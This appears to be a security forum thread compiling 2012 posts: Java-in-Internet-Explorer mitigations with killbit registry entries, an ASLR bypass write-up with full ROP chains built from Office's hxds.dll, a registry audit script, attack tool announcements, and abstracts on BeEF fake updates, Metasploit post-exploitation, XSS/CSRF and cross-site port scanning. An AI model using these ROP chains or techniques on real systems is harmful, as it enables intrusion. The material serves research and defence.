[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}]
"Compatibility Flags"=dword:00000400

Renaming the "jp2iexp.dll" file would also temporarily mitigate the APPLET and OBJECT tag attack vectors, but not the others mentioned. A Java update installation would drop the file back though, so bear that in mind.

Other classids that would need some interaction are also best killbitted:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}]
"Compatibility Flags"=dword:00000400

Using the latest classids for the Java version would require the user to acknowledge two warnings, but once accepted no warning would be given thereafter, so killbitting the CAFEEFAC- classids might be worth thinking about in your managed environment. Finally, JNLP files could be sent via email, so you might want to take a proactive step in blocking jnlp file attachments on your mail relays.

Latest Java release

Following the release of Java 7 update 10 last week I thought I'd do a quick check on its new security features. There is now an updated security tab giving the user more control over what to do. Changing the security levels makes changes to the file deployment.properties in the location C:\Users\user1\AppData\LocalLow\Sun\Java\Deployment. By default it's set to medium, but if changed to low the entry deployment.security.level=LOW is added to the file.
Since this is in a low integrity folder, this could be changed to LOW settings by a low privileged user.

#deployment.properties
#Wed Dec 19 17:48:16 GMT 2012
deployment.modified.timestamp=1355939296772
deployment.version=7.0
deployment.security.level=LOW
deployment.webjava.enabled=false
#Java Deployment jre's
#Wed Dec 19 17:48:16 GMT 2012
deployment.javaws.jre.0.registered=true
deployment.javaws.jre.0.platform=1.7
deployment.javaws.jre.0.osname=Windows
deployment.javaws.jre.0.path=C\:\\Program Files\\Java\\jre7\\bin\\javaw.exe
deployment.javaws.jre.0.product=1.7.0_10
deployment.javaws.jre.0.osarch=x86
deployment.javaws.jre.0.location=http\://java.sun.com/products/autodl/j2se
deployment.javaws.jre.0.enabled=true
deployment.javaws.jre.0.args=

Un-checking "Enable Java content in the browser" is quite a drastic step, as it deletes all classids, mimetypes, the jnlp file association, etc. The command that gets run when un-checking and applying is:

"C:\PROGRA~1\Java\jre7\bin\ssvagent.exe" -disablewebjava

This feature would most definitely protect from browser based attacks, but would also most likely break all your internal apps, so it is not something to implement without thorough testing in an enterprise environment. For home users it gives the flexibility to enable and disable when needed, say if you want to do a vulnerability scan which uses Java.

Conclusion

This research has shown that if you don't need Java it is best to just uninstall it. If there is a requirement, then upgrade to Java 7u10 and uncheck the Java content in the browser setting. Finally, follow CERT's advisory [4] or at the very least make the few mitigating changes mentioned in the "Preventing compromise" section, regardless of whether you have "Java content in the browser" enabled or disabled.
References:

[1] How to disable Java – Internet Explorer | Naked Security
[2] How to disable the Java web plug-in in Internet Explorer
[3] Internet Explorer security zones registry entries for advanced users
[4] US-CERT Vulnerability Note VU#636312 - Oracle Java JRE 1.7 Expression.execute() and SunToolkit.getField() fail to restrict access to privileged code
[5] How to Unplug Java from the Browser — Krebs on Security
[6] Controlling Java in Internet Explorer - IEInternals - Site Home - MSDN Blogs
[7] Using APPLET, OBJECT and EMBED Tags
[9] Java[tm] Web Start Developer's Guide
[10] JNLP File Syntax
[11] JNLP Support in the Next Generation Java™ Plug-In Technology (introduced in Java SE 6 update 10)
[12] Setting the Security Level of the Java Client

Source: Exploiting and mitigating Java exploits in Internet Explorer | GreyHatHacker.NET
8. Bypassing Microsoft Windows ASLR with a little help by MS-Help

Exploiting vulnerabilities on Windows 7 is not as easy as it used to be on Windows XP. Writing an exploit to bypass ASLR and DEP on Windows 7 was still relatively easy if Java 6 was installed, as it shipped with the non-ASLR msvcr71.dll library. Now that Java 7 has been out for a while, hopefully everyone should be using this version, as msvcr71.dll does not exist with Java 7. With this in mind, creating a reliable ROP chain is going to be difficult again, as finding some information leak is, my guess, not going to be straightforward, not to mention the time it would take to create our ROP chain if a leak even exists. So I set myself the task to see if I could create a reliable static ROP chain on a fully patched Windows 7 machine with and without Microsoft Office.

Windows 7 only

After carrying out a default installation of Windows 7 SP1 (Enterprise) and getting it all up-to-date with patches, I carried out a scan of all non-ASLR DLLs on the system and was amazed to find nearly 600 non-ASLR DLLs. OK, a lot were duplicates, so removing these from my list I ended up with around 200 unique DLLs to play with. One way I thought I could possibly load the library in Internet Explorer is by calling a classid object tag, so after searching for the clsid string in the DLLs one library stood out: "VsaVb7rt.dll".

Filename - VsaVb7rt.dll
Path - C:\Windows\Microsoft.NET\Framework\v2.0.50727\
MD5 hash - 22f450c23d8abdfa6bed991ad1c34b1c
Size - 1,340,752 bytes
Signed - 29th September 2010 08:46:12

After obtaining the classid guid using the tool Bintext, I loaded it up in the browser:

<HTML>
<OBJECT classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F'>
</OBJECT>
</HTML>

The issue with loading libraries via guids is that user interaction is first required before exploiting, so in the real world this would not be a viable option unless you're testing your own exploits from a specific address.

Once accepting the security warning it writes to the registry entry below.

Windows 7 with MS Office 2007/2010

With Windows 7 being a failure, I turned my attention to Office 2007, as most users running Windows 7 should be running Office 2010 or at the very least Office 2007. After a default installation of "Microsoft Office 2007 Plus", getting it fully up-to-date and carrying out another scan, a number of additional non-ASLR DLLs were found that could be loaded via their own guids as above, but again pretty useless with the prompts given. After browsing/grepping the strings in the libraries I found one library that could be loaded in Internet Explorer without any interaction, that library being "hxds.dll". This library can be loaded using its protocol handler by location.href = 'ms-help:'

<SCRIPT language="JavaScript">
location.href = 'ms-help:'
</SCRIPT>

This library does not get rebased either, so it is perfect for our ROP chain. Carrying out the same routine with "Microsoft Office 2010 Plus" I found the same library "hxds.dll" that we can use, but our ROP chain would be different as the file has been updated.
Details of the library on Office 2007

Filename - hxds.dll
Path - C:\Program Files\Common Files\microsoft shared\Help\
MD5 hash - 9e7370cc3d6a43942433f85d0e2bbdd8
Size - 873,216 bytes
Signed - 19th August 2006 11:52:41

Details of the library on Office 2010

Filename - hxds.dll
Path - C:\Program Files\Common Files\microsoft shared\Help\
MD5 hash - 23fdb0c309e188a5e3c767f8fc557d83
Size - 877,368 bytes
Signed - 23rd May 2009 12:24:33

Here is the ROP chain generated by Mona.py on Office 2007:

0x51be25dc, # POP EDI # RETN [hxds.dll]
0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x51bf1761, # POP EBP # RETN [hxds.dll]
0x51c4b2df, # & call esp [hxds.dll]
0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x00000201, # 0x00000201-> ebx
0x51bfa969, # POP EDX # RETN [hxds.dll]
0x00000040, # 0x00000040-> edx
0x51c385a2, # POP ECX # RETN [hxds.dll]
0x51c5b991, # &Writable location [hxds.dll]
0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x51c433d7, # POP EAX # RETN [hxds.dll]
0x90909090, # nop
0x51c0a4ec, # PUSHAD # RETN [hxds.dll]

and the ROP chain on Office 2010:

0x51bf34b4, # POP ESI # RETN [hxds.dll]
0x51bd10b8, # ptr to &VirtualProtect() [IAT hxds.dll]
0x51bd2d97, # MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll]
0x51bdcba0, # XCHG EAX,ESI # RETN 00 [hxds.dll]
0x51c379e2, # POP EBP # RETN [hxds.dll]
0x51c59683, # & call esp [hxds.dll]
0x51be198c, # POP EBX # RETN [hxds.dll]
0x00000201, # 0x00000201-> ebx
0x51c35ac3, # POP EDX # RETN [hxds.dll]
0x00000040, # 0x00000040-> edx
0x51becf3e, # POP ECX # RETN [hxds.dll]
0x51c5d150, # &Writable location [hxds.dll]
0x51bef563, # POP EDI # RETN [hxds.dll]
0x51c07402, # RETN (ROP NOP) [hxds.dll]
0x51c56fbd, # POP EAX # RETN [hxds.dll]
0x90909090, # nop
0x51c3604e, # PUSHAD # RETN [hxds.dll]

In order for our exploit to be successful, I've seen it's best to call the protocol handler after the heap spray and before triggering the vulnerability. Finally, here is an exploit (password "answerworks", md5hash 5bc94894890298710f30d91d6104e568) based on my last post, where I have just changed the ROP chain from using msvcr71.dll to using hxds.dll.

For now I see two options to mitigate this. One is to disable the protocol handler, which can be done easily by changing the name or value in the registry or deleting it completely. The downside is that I don't know how it would impact applications using this handler.

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-help]
@="Help HxProtocol"
"CLSID"="{314111c7-a502-11d2-bbca-00c04f8ec294}"

The second option would be to get Microsoft EMET installed, if you haven't already done so, and make sure "MandatoryASLR" is enabled for the iexplore.exe process. I can't emphasize enough how vital it is to have this tool installed, so please do not delay and get it deployed ASAP.

Source: Bypassing Microsoft Windows ASLR with a little help by MS-Help | GreyHatHacker.NET
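As an added example (not code from either GreyHatHacker post), the Python script below audits the registry mitigations listed in the Java post above (the "Preventing compromise" keys and the extra killbits) together with the ms-help protocol handler this post suggests disabling. The key paths and expected values are the ones quoted in the posts; the snapshot reader and its sample values are constructed for offline testing, and the live winreg reader only works on Windows.

```python
"""Audit of the Internet Explorer / Java registry mitigations from the posts above.

Added example: the key paths and expected values are the ones the posts list;
the surrounding code is not from the posts. audit() reports every mitigation
that is not in place; an empty list means all of them are applied.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple, Union

RegValue = Union[int, bytes, str, None]
Reader = Callable[[str, str, str], RegValue]  # (hive, key path, value name) -> data

# Bit in "Compatibility Flags" that kill-bits a control (dword:00000400 in the posts).
KILLBIT = 0x00000400

HKLM = "HKEY_LOCAL_MACHINE"
HKCU = "HKEY_CURRENT_USER"
AX_COMPAT = r"Software\Microsoft\Internet Explorer\ActiveX Compatibility"


@dataclass(frozen=True)
class Check:
    hive: str
    key: str
    value: str
    what: str
    mode: str        # "equals": value must equal expected
                     # "killbit": KILLBIT must be set in the value
                     # "absent": the value must not exist (handler renamed/removed)
    expected: int = 0


CHECKS: List[Check] = [
    Check(HKLM, r"SOFTWARE\Classes\JNLPFile", "EditFlags",
          "JNLP files open without a prompt", "equals", 0),
    Check(HKCU, r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3",
          "1C00", "Java permissions in the Internet zone", "equals", 0),
    Check(HKLM, AX_COMPAT + r"\{8AD9C840-044E-11D1-B3E9-00805F499D93}",
          "Compatibility Flags", "Java Plug-in control", "killbit"),
    Check(HKLM, AX_COMPAT + r"\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}",
          "Compatibility Flags", "Java Deployment Toolkit control", "killbit"),
    Check(HKLM, AX_COMPAT + r"\{5852F5ED-8BF4-11D4-A245-0080C6F74284}",
          "Compatibility Flags", "Java Web Start control", "killbit"),
    Check(HKLM, AX_COMPAT + r"\{E19F9331-3110-11D4-991C-005004D3B3DB}",
          "Compatibility Flags", "Java control needing user interaction", "killbit"),
    Check(HKLM, r"SOFTWARE\Classes\PROTOCOLS\Handler\ms-help", "CLSID",
          "ms-help protocol handler (loads the non-ASLR hxds.dll)", "absent"),
]


def as_dword(data: RegValue) -> Optional[int]:
    """CERT writes EditFlags as REG_BINARY, the post as a DWORD: accept both."""
    if isinstance(data, bytes):
        return int.from_bytes(data, "little")
    if isinstance(data, int):
        return data
    return None  # missing, or a string where a number was expected


def audit(reader: Reader) -> List[str]:
    """Return one human-readable finding per mitigation that is not applied."""
    findings: List[str] = []
    for c in CHECKS:
        data = reader(c.hive, c.key, c.value)
        if c.mode == "absent":
            if data is not None:
                findings.append(f"{c.what}: {c.key} still registered (CLSID {data})")
            continue
        dword = as_dword(data)
        if dword is None:
            findings.append(f"{c.what}: {c.value} missing under {c.key}")
        elif c.mode == "equals" and dword != c.expected:
            findings.append(f"{c.what}: {c.value} is {dword:#010x}, expected {c.expected:#010x}")
        elif c.mode == "killbit" and not dword & KILLBIT:
            findings.append(f"{c.what}: killbit not set ({c.value} is {dword:#010x})")
    return findings


def winreg_reader(hive: str, key: str, value: str) -> RegValue:
    """Live reader for Windows hosts; None when the key or value does not exist.
    It sees the registry view of the running interpreter, so on 64-bit Windows
    run it from a 32-bit Python as well to cover what 32-bit IE reads."""
    import winreg  # Windows only; imported here so the module loads elsewhere
    try:
        with winreg.OpenKey(getattr(winreg, hive), key) as handle:
            data, _kind = winreg.QueryValueEx(handle, value)
            return data
    except FileNotFoundError:
        return None


def snapshot_reader(values: Dict[Tuple[str, str, str], RegValue]) -> Reader:
    """Reader over a constructed in-memory snapshot, for testing without Windows."""
    return lambda hive, key, value: values.get((hive, key, value))


# Constructed snapshot of a host with every mitigation from the posts applied
# (EditFlags in CERT's binary form, one killbit with an extra flag bit set).
HARDENED: Dict[Tuple[str, str, str], RegValue] = {
    (HKLM, r"SOFTWARE\Classes\JNLPFile", "EditFlags"): b"\x00\x00\x00\x00",
    (HKCU, r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", "1C00"): 0,
    (HKLM, AX_COMPAT + r"\{8AD9C840-044E-11D1-B3E9-00805F499D93}", "Compatibility Flags"): 0x400,
    (HKLM, AX_COMPAT + r"\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}", "Compatibility Flags"): 0x401,
    (HKLM, AX_COMPAT + r"\{5852F5ED-8BF4-11D4-A245-0080C6F74284}", "Compatibility Flags"): 0x400,
    (HKLM, AX_COMPAT + r"\{E19F9331-3110-11D4-991C-005004D3B3DB}", "Compatibility Flags"): 0x400,
}

if __name__ == "__main__":
    for line in audit(winreg_reader):
        print("NOT MITIGATED:", line)
```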
9. It's Tinkode, in case you hadn't figured it out.
10. Pff, I wanted to make something like this too. But it looks very good.
11. What gossip about you? Do we have another celebrity? I haven't heard anything about you since... the thing before Defcamp. As for tex, people talk a lot without knowing; I don't know much either, but I refrain from making comments.
12. Mptcp Packet Manipulator 1.9.0

Authored by Khun | Site hexcodes.org

Mptcp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios involving the use of various types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulate various fields at runtime. These fields can be modified in its structure, such as the Source/Destination IP address and Source/Destination MAC address.

Changes: Added support for Display Packet Content (tcpdump style). More hard compiler optimizations. Full support for Darwin OS. Various other additions and improvements.

Download: http://packetstormsecurity.org/files/download/119132/mptcp-1.9.0.tar.gz

Source: Mptcp Packet Manipulator 1.9.0 - Packet Storm
13. Malheur Malware Analyzer 0.5.3

Authored by Konrad Rieck | Site mlsec.org

Malheur is a tool for automatic analysis of program behavior recorded from malicious software (malware). It is designed to support the regular analysis of malicious software and the development of detection and defense measures. It allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes. It can be applied to recorded program behavior of various formats as long as monitored events are separated by delimiter symbols, e.g. as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox, and Joebox.

Changes: The tool's persistent state is stored in the local state directory for better maintenance. Several minor bugs have been fixed.

Download: http://packetstormsecurity.org/files/download/119128/malheur-0.5.3.tar.gz

Source: Malheur Malware Analyzer 0.5.3 - Packet Storm
14. Insecure Authentication Control In J2EE

Authored by Ashish Rao

This is a whitepaper discussing insecure authentication control in J2EE implemented using sendRedirect().

Download: http://packetstormsecurity.org/files/download/119129/insecureauth-j2ee.pdf

Source: Insecure Authentication Control In J2EE - Packet Storm
15. Hashcat's GPU-accelerated Gauss encryption cracker

GReAT, Kaspersky Lab Expert
Posted December 28, 10:45 GMT

2012 was a year full of major security incidents: Flame, Shamoon, Flashback, Wiper, Gauss, and so on. As we are about to turn the page, many unsolved mysteries still remain. Perhaps the most interesting unsolved mysteries are related to the Gauss Trojan: the Palida Narrow font and the unknown encrypted payload.

Previously, we've published a blogpost about the encrypted payload, hoping that the crypto community will take on the challenge and break the encryption scheme to reveal the true purpose of the mysterious malware.

Yesterday, Jens 'atom' Steube, who is best known as the author of '(ocl)hashcat', a GPU accelerated password recovery tool, released his Gauss cracker as open source software under a GPL license. This is a major breakthrough towards solving the Gauss encryption scheme because of the speeds it achieves: 489k c/s on an AMD Radeon HD 7970 card. If you're wondering, this is over 30 times faster than an AMD FX 8120 CPU.

You can download the sources and Linux binary from Jens' 'hashcat' page. Happy New (Cracking) Year!

Download: https://hashcat.net/oclGaussCrack/

Source: Hashcat's GPU-accelerated Gauss encryption cracker - Securelist
16. Analysts: Anonymous to decline in 2013

By Brett Winterford on Dec 28, 2012 9:54 AM

Security vendor finds hacking group predictable.

Senior security researchers at Intel-owned security vendor McAfee have dubbed 2013 the year the Anonymous hacking collective will face stagnation and decline.

Anonymous, a 'loosely connected' hacktivist movement that sprung up from 4Chan in 2003, has for a decade directed cyber-attacks at targets as varied as News Corp, the US, UK and Australian Governments, suspected pedophilia rings, the Church of Scientology and various rights holder groups such as record and film companies.

Such was Anonymous' momentum and impact that Time Magazine named the collective the 'Person of the Year' in 2012.

But McAfee analysts, releasing their 2013 predictions, have gauged that Anonymous' techniques are now well understood and predicted its influence will decline.

"Sympathisers of Anonymous are suffering," the analysts wrote. "Too many uncoordinated and unclear operations have been detrimental to its reputation."

"Anonymous' level of technical sophistication has stagnated," McAfee said, referring to the group's reliance on Distributed Denial of Service attacks, "and its tactics are better understood by its potential victims."

The analysts said Anonymous may draw new support from alliances with anti-globalisation groups such as splinters of the Occupy Wall Street movement.

The future for hacktivism, the analysts said, is in the hands of individuals and groups prepared to be named when hacking for a cause they feel is just. McAfee analyst Francois Paget has argued for over 12 months that this strategy will prevail so long as Anonymous hackers are willing to out each other.

A larger concern, the analysts said, is the growing numbers and sophistication of groups of "patriot" hackers attacking institutions that do not subscribe to their political world view, not to mention the sanctioned cyber-armies of nation states.
Among McAfee's other predictions:

Rapid development of ways to attack Windows 8 and HTML5.
The rise of mobile worms that buy malicious apps and steal via tap-and-pay NFC.
Large-scale attacks like Stuxnet that attempt to destroy infrastructure.
SMS spam from infected phones.
"Hacking as a Service" and the rise of mobile phone ransomware "kits".
Nation states and armies will be more frequent sources and victims of cyberthreats.

Source: Analysts: Anonymous to decline in 2013 - Security - Technology - News - iTnews.com.au
17. THC-IPv6 Attack Tool 2.1

Authored by van Hauser, thc | Site thc.org

THC-IPv6 is a toolkit that attacks the inherent protocol weaknesses of IPv6 and ICMP6, and it includes an easy to use packet factory library.

Changes: 4 new tools, features, and bug fixes

Download: http://packetstormsecurity.org/files/download/119116/thc-ipv6-2.1.tar.gz

Source: THC-IPv6 Attack Tool 2.1 - Packet Storm
18. It's clear
19. I'm just curious about one thing. What do you mean by "eth0"? What does the Ethernet interface "eth0" mean in your terminology?
20. Beef Fake Browser Update Exploitation

Description: In this video I will show you how to use the BeEF Framework for fake browser update exploitation.

Fake Browser Update: In the BeEF Framework there is a new feature available in social-engineering called Clippy. Using this feature we send a fake update notification, and if the user clicks on it, obviously he is going to install that exe and on the other side you will get the meterpreter session. Very easy to perform, but very good for social-engineering.

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

BeEF: BeEF - The Browser Exploitation Framework Project
PDF: BeEF Fake Browser Update Exploitation.pdf

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Beef Fake Browser Update Exploitation
21. Linux Post - Exploitation Using Metasploit Framework

Description: In this video I will show you how to perform post exploitation on a Linux system using the Metasploit Framework. So, in Metasploit there are 9-10 modules available for Linux post exploitation; all modules are working very well. I think these modules are the best for post-exploitation on Linux, very easy to use and effective.

Modules used:

Linux Gather Dump Password Hashes for Linux Systems | Metasploit Exploit Database (DB)
Post Module to dump the password hashes for all users on a Linux System.

Linux Gather Virtual Environment Detection | Metasploit Exploit Database (DB)
This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM.

Linux Gather Configurations | Metasploit Exploit Database (DB)
This module collects configuration files found on commonly installed applications and services, such as Apache, MySQL, Samba, Sendmail, etc. If a config file is found in its default path, the module will assume that is the file we want.

Linux Gather Network Information | Metasploit Exploit Database (DB)
This module gathers network information from the target system: IPTables rules, interfaces, wireless information, open and listening ports, active network connections, DNS information and SSH information.

Linux Gather Protection Enumeration | Metasploit Exploit Database (DB)
This module tries to find certain installed applications that can be used to prevent, or detect our attacks, which is done by locating certain binary locations, and seeing if they are indeed executables. For example, if we are able to run 'snort' as a command, we assume it's one of the files we are looking for. This module is meant to cover various antivirus, rootkits, IDS/IPS, firewalls, and other software.

Linux Gather System and User Information | Metasploit Exploit Database (DB)
This module gathers system information. We collect installed packages, installed services, mount information, user list, user bash history and cron jobs.

Linux Gather User History | Metasploit Exploit Database (DB)
This module gathers user specific information: user list, bash history, mysql history, vim history, lastlog and sudoers.

Source: Penetration Testing Software | Metasploit
PDF: Linux Post Exploitation.pdf

Source: Linux Post - Exploitation Using Metasploit Framework
22. Web Framework Vulnerabilities

Description:

Abstract

This talk will give participants an opportunity to practically code review Web Application Framework based applications for security vulnerabilities. The material in this talk covers the common vulnerability anti-patterns which show up in applications built on the most popular enterprise web application frameworks (Struts 2, Spring MVC, Ruby on Rails, and .NET MVC). Sample applications are provided with guided tasks to ease participants into understanding the vulnerabilities in each framework and the overall steps a code reviewer should follow to identify these vulnerabilities. This talk is a trimmed down version of the 3 hour workshop given at Blackhat. This is an advanced talk and an understanding of the application frameworks is a prerequisite to get the most out of this talk.

*****

Speaker: Abraham Kang, Principal Security Researcher, HP Fortify

Abraham Kang is fascinated with the nuanced details associated with programming languages and their associated APIs in terms of how they affect security. Abraham has a Bachelor of Science from Cornell University. Abraham currently works for HP Fortify as a Principal Security Researcher. Prior to joining Fortify, Abraham worked in application security for over 10 years, with the most recent 4 years being a security code reviewer at Wells Fargo. Abraham is focused on application, framework, and mobile security and has presented his findings at Blackhat USA, BSIDES, OWASP, Baythreat and HP Protect.

Original Source: Web Framework Vulnerabilities - Abraham Kang on Vimeo

Source: Web Framework Vulnerabilities
23. Hacking With Web Sockets

Description:

Abstract

HTML5 isn't just for watching videos on your iPad. Its features may be the target of a security attack as much as they may be used to improve an attack. Vulnerabilities like XSS have been around since the web's beginning, but exploiting them has become increasingly sophisticated. HTML5 features like WebSockets are part of the framework for controlling browsers compromised by XSS. This presentation provides an overview of WebSockets: how they might increase the attack surface of a web site, their implications for privacy, and the potential security problems with protocols tunneled over them. Then it demonstrates how WebSockets can be used as an effective part of a hacking framework. It closes with recommendations for deploying WebSockets securely, applying security principles to web app design, and providing a tool for exploring WebSockets security.

*****

Speaker: Vaagn Toukharian - Senior Software Engineer, Qualys

Senior Software Engineer for Qualys's Web Application Scanner. | Has been involved with the security industry since 1999. | Experience includes work on Certification Authority systems, encryption devices, large CAD systems, Web scanners. | Outside of work interests include IronMan triathlons and photography.

Original Source: Hacking with Web Sockets - Vaagn Toukharian on Vimeo

Source: Hacking With Web Sockets
24. Cross Site Port Scanning

Description:

Abstract

Several web applications provide functionality to pull data from other Internet facing Web Applications, for either internal use or to verify application availability. We see this in the form of applications pulling images using user specified URLs, applications showing server status for user specified URLs, applications pulling feeds, XML and manifest files, etc. An attacker can abuse this functionality to send crafted queries to a remote web server using the application that provides this functionality. The responses can be studied and, in the case of unique responses, can be abused to do a blind port scan on any Internet facing device or even on internal local networks and the same server/host.

In this paper we will see how this commonly available functionality in most web applications can be abused by attackers to port scan other servers, or perform a Cross Site Port Scan (XSPS). I found this issue with Facebook, where I was able to port scan any Internet facing server using Facebook's IP addresses. Consecutively, I was able to identify this issue in several other prominent Web Applications on the Internet, including Google, Apigee, StatMyWeb, Mozilla.org, Face.com, Pinterest, Yahoo, Adobe and several others. We will take a look at the vulnerabilities that were present in the above mentioned web applications that allowed me to abuse the functionality to perform port scans on remote servers using predefined functionality.

An attacker can abuse this by specifying URLs in the form of servername: to the application and reviewing the response obtained. I have seen three unique responses based on port and service. The following are the different errors/response messages obtained:

1. For an open port running an HTTP service, the error/server response is specific to the call. An attacker may see HTML content or a function specific message like "Image not found" or "Invalid data stream".

2. For an open port running a service other than HTTP (like SSH, TELNET, SMTP or RDP), the error/server response is mostly generic, like "Invalid data stream", "Expected content-type was invalid" or "Received HTTP error code -1 while fetching source feed".

3. For a closed port, the errors/server responses are often descriptive, like "HTTP/1.1 503 Service Unavailable", "[Errno 101] Network is unreachable" or "DOWNLOAD_ERROR_CONNECTION_REFUSED" etc.

Based on these error messages, which are unique for every server tested, we can conclusively identify closed and open ports on remote servers. Even better, in some cases the application displays the actual responses received in raw format, allowing us to use it for banner grabbing.

Cross Site Port Scanning is a technique that allows an attacker to abuse perfectly common functionality, like fetching a file or data from a remote server, to perform blind port scans on Internet facing servers. An application which accepts user input as a URL, fetches content from the user supplied URL and displays non-generic errors, is vulnerable to XSPS. An attacker can also enumerate ports on the server that makes the HTTP request on behalf of the user by providing localhost as the URL with a port parameter.

Simply put, an application that accepts a URL like site/images/derp.jpg, fetches the content on the server side and displays the image, is vulnerable if it displays port status or connection specific errors when a user requests the following URLs:

site:22/images/nonexistentimage.jpg
site:23/images/nonexistentimage.jpg
site:3128/images/nonexistentimage.jpg
site:3389/images/nonexistentimage.jpg

An attacker would then be able to analyze the error messages and identify open and closed ports based on unique error responses. These responses may be raw socket errors (like "Connection refused" or timeouts) or may be customized by the application (like "Unexpected header found" or "Service was not reachable").

*****

Speaker: Riyaz Walikar

I am a Web Application Security Engineer / Pentester / Network Security Architect for food, shelter, fun and passion. I have had luck with finding vulnerabilities in popular web applications like Facebook, Twitter, Google, Cisco, Symantec, Mozilla, PayPal, Ebay, Apigee etc., for which I am on the Hall of Fame for most of these services. You can follow me on twitter @riyazwalikar. My interests lie with vulnerability research, breaking web applications, playing CTFs, finding new ways into computer networks, playing football and fishing. riyazwalikar.com

Original Source: Cross Site Port Scanning - Riyaz Walikar on Vimeo

Source: Cross Site Port Scanning
25. Xss And Csrf With Html5 - Attack, Exploit And Defense

Description:

Abstract

HTML5 has empowered the browser with a number of new features and functionalities. Browsers with this new architecture include features like the XMLHttpRequest Object (L2), Local Storage, File System APIs, WebSQL, WebSocket, File APIs and many more. The browser is emerging as a platform like a little operating system and has expanded its attack surface significantly. Applications developed in this new architecture are exposed to an interesting set of vulnerabilities and exploits. Both traditional vulnerabilities like CSRF and XSS can be exploited in this new HTML5 architecture. In this talk we will cover the following new attack vectors and variants of XSS and CSRF:

HTML5 driven CSRF with XMLHttpRequest (Level 2)
CSRF with two way attack stream
Cross Site Response Extraction attacks using CSRF
Cross Origin Resource Sharing (CORS) policy hacking and CSRF injections
DOM based XSS with HTML5 applications
Exploiting HTML5 tags, attributes and events
DOM variable extraction with XSS
Exploiting Storage, File System and WebSQL with HTML5 XSS
Layered XSS and making it sticky with HTML5 based iframe sandbox
Jacking with HTML5 tags and features

In this session we will cover new methodology and tools along with some real life cases and demonstrations. At the end we will cover some interesting defense methodologies to secure your HTML5 applications.

*****

Speaker: Shreeraj Shah

Shreeraj Shah, B.E., MSCS, MBA, is the founder of Blueinfy and iAppSecure Solution. Prior to founding Blueinfy, he was founder and board member at Net Square. He also worked with Foundstone (McAfee), Chase Manhattan Bank and IBM in the security space. He is also the author of popular books like Web 2.0 Security, Hacking Web Services and Web Hacking: Attacks and Defense. In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, ISACA etc. His articles are regularly published on Securityfocus, InformIT, DevX, O'Reilly and HNS. His work has been quoted on BBC, Dark Reading, Bank Technology, MIT Technology Review and SecurityWeek as an expert in the area of HTML5, Web 2.0 and Browser technologies and security.

Original Source: XSS & CSRF with HTML5 - Attack, Exploit and Defense - Shreeraj Shah on Vimeo

Source: Xss And Csrf With Html5 - Attack, Exploit And Defense